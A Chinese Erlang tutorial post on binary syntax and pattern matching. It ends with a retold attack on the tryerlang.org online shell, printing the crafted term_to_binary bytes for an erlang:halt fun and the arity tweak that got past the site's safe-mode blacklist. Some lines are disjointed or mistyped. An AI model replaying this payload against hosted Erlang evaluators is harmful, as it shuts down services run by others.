[Erlang20]一起攻克Binary
Cowboy aims to provide a complete HTTP stack in a small code base. It is optimized for low latency and low memory usage, in part because it uses binary strings.
- ErlangVM 是怎么实现Binary数据类型的,实现原理从宏观到细节,值得反复细读:http://www.cnblogs.com/zhengsyao/p/erlang_eterm_implementation_5_binary.html
- 这个是从应用层上去具体使用上去解释为什么Binary会非常高效且内存占用比List少:http://cryolite.iteye.com/blog/1547252
- 1 中提到的官方效率指南:http://www.erlang.org/doc/efficiency_guide/binaryhandling.html
- 如果要处理Binary最好自己写模式匹配或使用binary.erl里面的函数:http://stackoverflow.com/questions/21779394/erlang-high-memory-usage-for-processing-list-of-binary-parts
- 一个讲故事介绍Binary原理的文章:http://dieswaytoofast.blogspot.com/2012/12/erlang-binaries-and-garbage-collection.html
keep_0XX([{0,B2,B3}|Rest]) -> [{0,B2,B3}|keep_0XX(Rest)]; keep_0XX([{1,_,_}|Rest]) -> keep_0XX(Rest); keep_0XX([]) -> [].
keep_0XX(List) ->
[{0,B2,B3} || {0,B2,B3} <- List].
keep_0XX(Bin) ->
[ <<0:1,B:2>> || <<0:1,B:2>> <= Bin].
<<Segment1,Segment2,...,Senmentn>>
Value:Size/TypeSpecifierList
Segment | Default expansion |
X | X:8/integer-unit:1 |
X/float | X:64/float-unit:1 |
X/binary | X:all/binary |
X:size/binary | X:Size/binary-unit:8 |
Binary = <<10, 11, 12>>, <<A:8, B/binary>> = Binary. A=10,B=<<11,12>>.
<<Sz:8/integer, Vsn:Sz/integer, Msg/binary>> = <<16,2,154,42>>. Sz = 16,Vsn=666,Msg=<<42>>.
case Binary of <<42:8/integer, X/binary>> -> handle_bin(X); <<Sz:8, V:Sz/integer, X/binary>> when Sz > 16 -> handle_int_bin(V, X); << :8, X:16/integer, Y:8/integer>> -> handle int_int(X, Y) end.
Binary | Matching of X |
<<42,14,15>> | <<14,15>> |
<<24,1,2,3,10,20>> | <<10,20>> |
<<12,1,2,20>> | 258 |
<<0,255>> | failure |
1> [ X || <<X>> <= <<1,2,3,4,5>>, X rem 2 == 0]. [2,4]
5.2 如果你只是想把不是binary处理后变成一个binary就不用使用 <=
2> << <<R:8, G:8, B:8>> || {R,G,B} <- [{213,45,132},{64,76,32},{76,0,0},{234,32,15}] >>.
<<213,45,132,64,76,32,76,0,0,234,32,15>>
113 | Module | Function | Arity
113代表的是fun类型, Module 和 Function 都是 atoms , Arity 是一个整数. 这些atoms可以使用 ATOM_EXT来解码 ,那Arity可以使用 SMALL_INTEGER_EXT解码 .
atoms的解码格式是这样子:
100 | Len | AtomName
Len
是AtomName的长度
,有2bytes.
整数的解码格式是这样子:
97 | Int
Eshell V5.8.1 (abort with ^G) > term_to_binary(erlang). <<131,100,0,6,101,114,108,97,110,103>> > term_to_binary(halt). <<131,100,0,4,104,97,108,116>>
<<100,0,6,101,114,108,97,110,103,100,0,4,104,97,108,116>>
然后再把131(所有的term_to_binary/1都会加的), 113
(外部funs的类型标识)最后不要在结尾忘了arity:0:
<<131,113,100,0,6,101,114,108,97,110,103,100,0,4,104,97,108,116,97,0>>
这样,我们就把外部fun erlang:halt/0用binary的形式表现出来了!
> binary_to_term(<<131,113,100,0,6,101,114,108,97,110,103,100,0,4,104,97,108,116,97,0>>).
8>#Fun<erlang.halt.0>
那么,现在把我们的成果搞到tryerlang.org的shell里面:
>B = <<131,113,100,0,6,101,114,108,97,110,103,100,0,4,104,97,108,116,97,0>>.
然后我们再把B从binary转成Erlang term. 最开始时, tryerlang.org 可以使用 the binary_to_term function in safe mode. 这个函数从那次攻击之后也被加入黑名单,所以你只能在你自己的shell里面试试:)
>F = binary_to_term(B, [safe]).
现在我们来启动一个这个Fun看看:
>F().
很好,现在还是不行 tryerlang.org 会察觉到 erlang:halt/0
会被调用,然后把他阻塞住. 我们需要再小小改变一下:
erlang:halt/0
exists, taking exactly one argument. 来做. 我们只需要把最后一个0改成1,记得先使用BIF f/1把变量B.> f(B). > B = <<131,113,100,0,6,101,114,108,97,110,103,100,0,4,104,97,108,116,97,1>>.
然后我们应该就可以啦:
> f(F). >F = binary_to_term(B, [safe]). >lists:map(F, [0]).
Please note that the hacker had the advantage to look at the source code for tryerlang.org while performing the attack.
I wanted to share this experience with all of you. I consider it highly constructive, since it leads to reflect on several aspects of Erlang
祝马上就要开学的各位高中生们逛街时偶遇班主任~~~哈哈~~~